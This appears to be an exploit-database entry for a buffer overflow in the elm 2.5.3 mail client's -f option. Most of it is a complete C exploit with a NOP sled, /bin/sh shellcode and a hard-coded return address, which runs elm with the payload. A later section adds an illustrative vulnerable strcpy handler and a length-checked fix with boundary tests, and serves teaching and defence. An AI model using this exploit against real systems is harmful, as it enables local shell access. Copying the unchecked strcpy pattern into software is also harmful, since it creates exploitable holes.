Elm 2.5.3 – Alternative-Folder Buffer Overflow

Vulnerability ID: 1053516
Vulnerability type: (none listed)
Published: 2001-02-13    Updated: 2001-02-13
CVE ID: N/A
CNNVD ID: N/A
Platform: Linux    CVSS score: N/A

Source
https://www.exploit-db.com/exploits/20645

Details
Vulnerability details have not yet been disclosed.

Exploit
source: http://www.securityfocus.com/bid/2403/info

There is a buffer overflow in elm 2.5 PL3. This overflow is accessible by passing a long string to the -f (Alternative-Folder) command-line option. This vulnerability may not be restricted to this version of elm. 

/***
    -------------
    elm253-exploit.c
    -------------
***/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP    0x90          /* x86 no-op byte used for the sled */
#define LEN    356           /* length of the overflowing payload */
#define OFFSET 0             /* declared but unused in this version */
#define RET    0xbffffa64    /* hard-coded guess for the stack address */

/* Returns the current stack pointer (left in %eax). Not used below. */
unsigned long dame_sp() {
        __asm__("movl %esp,%eax");
}

int main() {

        /* Linux/x86 execve("/bin/sh") shellcode */
        static char shellcode[]=
/* "\x31\xc0"   */              /* xorl %eax,%eax        */
/* "\x31\xdb"   */              /* xorl %ebx,%ebx        */
/* "\xb0\x17"   */              /* movb $0x17,%al        */
/* "\xcd\x80"   */              /* int $0x80             */
"\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
"\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";

        int i=0;
        int cont=0;
        char buffer[LEN+5];          /* one extra byte for the terminating NUL */
        char kid[6+LEN+4];

        printf("-------------------------------------\n");
        printf("elm buffer overflow exploit by _kiss_\n");
        printf("-------------------------------------\n");

        /* Fill the whole buffer with the return address */
        for (i=0;i<=LEN;i+=4)
                *(long *) &buffer[i] = RET;

        /* NOP sled at the start of the buffer */
        for (i=0;i<LEN-strlen(shellcode)-100;i++)
                buffer[i]=NOP;

        /* Shellcode after the sled, leaving 100 bytes of RET at the end */
        for (i=LEN-strlen(shellcode)-100;i<LEN-100;i++)
                buffer[i]=shellcode[cont++];

        buffer[LEN+4]='\0';          /* terminate so strcat() does not read past the buffer */

        /* Hand the payload to elm's -f option through the environment */
        strcpy(kid,"KID=");
        strcat(kid,buffer);
        putenv(kid);
        system("/usr/local/bin/elm -f $KID");
        return 0;
}
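The advisory says the overflow is reached by passing an over-long string to the -f option. The following added illustration is not elm's source (which is not on this page) and not part of the original exploit-db entry: it shows a hypothetical option handler written two ways, the unchecked strcpy() pattern that produces this class of bug and a checked version that refuses input that does not fit. FOLDER_MAX, set_folder_unsafe, set_folder_safe and demo_folder_check are assumed names for this example only.

```c
#include <stdio.h>
#include <string.h>

#define FOLDER_MAX 256   /* assumed size of the fixed folder buffer */

/* Vulnerable pattern (hypothetical, not elm's code): strcpy() copies until
 * the NUL of `arg`, so any argument of FOLDER_MAX or more bytes writes past
 * `folder` on the stack.  Never call this with untrusted input. */
int set_folder_unsafe(const char *arg, char *out) {
    char folder[FOLDER_MAX];
    strcpy(folder, arg);            /* no length check: overflow on long input */
    strcpy(out, folder);
    return 0;
}

/* Hardened form: measure first, reject anything that does not fit, and
 * copy exactly n+1 bytes so the result is always NUL-terminated.  Rejecting
 * is preferred over silent truncation, which could open the wrong folder. */
int set_folder_safe(const char *arg, char *out, size_t outsz) {
    size_t n = strlen(arg);
    if (n == 0 || n >= outsz) {
        return -1;                  /* caller reports "folder name too long" */
    }
    memcpy(out, arg, n + 1);
    return 0;
}

/* Builds a constructed argument of `len` 'A' bytes and runs it through the
 * checked handler.  Returns 0 when accepted, -1 when rejected. */
int demo_folder_check(size_t len) {
    char arg[1024];                 /* constructed test input */
    char folder[FOLDER_MAX];
    if (len >= sizeof arg) {
        return -1;
    }
    memset(arg, 'A', len);
    arg[len] = '\0';
    return set_folder_safe(arg, folder, sizeof folder);
}

int main(void) {
    /* Boundary cases: the last accepted length is FOLDER_MAX - 1 */
    size_t lens[] = { 5, FOLDER_MAX - 1, FOLDER_MAX, 400 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        printf("length %4zu -> %s\n", lens[i],
               demo_folder_check(lens[i]) == 0 ? "accepted" : "rejected");
    }
    return 0;
}
```

The check in set_folder_safe is the whole fix: the buffer size is compared against the input length before any byte is copied, so a 356-byte payload like the one in the exploit above is refused rather than written onto the stack.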
